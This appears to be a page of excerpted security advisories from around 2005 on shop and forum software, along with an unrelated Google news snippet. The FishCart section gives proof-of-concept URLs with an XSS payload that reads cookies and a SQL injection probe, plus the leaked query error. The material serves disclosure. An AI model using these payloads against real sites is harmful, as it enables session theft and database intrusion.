Vendor: FishNet Inc
Vendor Website: http://www.fishnetinc.com
Summary: There are, multiple sql injections and xss in fishcart 3.1.
Proof of Concept Exploits:
http://example.com/demo31/display.php?
cartid=200505024231092&zid=1&lid=1&nlst=’”>
<script>alert(document.cookie)</script>&olimit=0&cat=&key1=&psku=
XSS
http://example.com/demo31/display.php?cartid=200505024231092&zid=
1&lid=1&nlst=y&olimit=0&cat=&key1=&psku=’SQL_INJECTION
SQL INJECTION
Database error: Invalid SQL: select count(*) as cnt from
cvsdemo31prod,cvsdemo31prodlang where nzid=1 and nprodsku=prodsku and
prodzid=1 and nprodsku=prodlsku and prodlzid=1 and
prodlid=1prodsku=”’SQL_INJECTION’ and prodlsku=”’SQL_INJECTION’ and
prodzid=1 and prodzid=prodlzid and prodlid=1 and (produseinvq=0 or
(produseinvq=1 and prodinvqty>0))
MySQL Error: 1054 (Unknown column ‘nzid’ in [...]
Google has introduced a technology designed to make Web sites load faster.
A beta, or test version, of Web Accelerator was introduced via the Google Labs technology incubation site late Wednesday. The tool, which must be downloaded, will tap into the power of Google’s global computer network and thus help sites load faster, according to the [...]
“myBloggie is considered one of the most simple, user-friendliest yet packed
with features
Weblog system available to date. Built using PHP & mySQL, web most popular
scripting
language & database system enable myBloggie to be installed in any
webservers.”
–) Full Path Disclosure
Thanks to an improper sanitization of the post_id parameter, it’s possible
to show the
full path by sending a simple request:
[...]
0×01 - Affected software description:
————————————-
MidiCart is a Try-Before-You-Buy Shopping Cart Software, that provides all you need to
create, operate, and maintain a professional Internet shop. MidiCart ASP and PHP Shopping
Cart is extremely easy to use, flexible, powerful and affordable e-commerce solution for
your web site.
0×02 - Vulnerability Discription:
———————————
There are several vulnarabilities in midicart. First there are some [...]
A security issue affects the following Ubuntu releases:
Ubuntu 4.10 (Warty Warthog)
Ubuntu 5.04 (Hoary Hedgehog)
The following packages are affected:
apache2-utils
The problem can be corrected by upgrading the affected package to
version 2.0.50-12ubuntu4.2 (for Ubuntu 4.10) and 2.0.53-5ubuntu5.1
(for Ubuntu 5.04). In general, a standard system upgrade is
sufficient to effect the necessary changes.
Details follow:
Luca Ercoli discovered that the “htdigest” program [...]
Description:
An attacker does not have to be logged in, or even have access
or permission to view the forums in order to exploit this
vulnerability. Users should upgrade immediately.
SQL Injection:
I have discovered a serious SQL Injection issue in Invision
Power Board that affects most all versions of Invision Power
Board regardless of most server configurations. Also, because
of the fact [...]
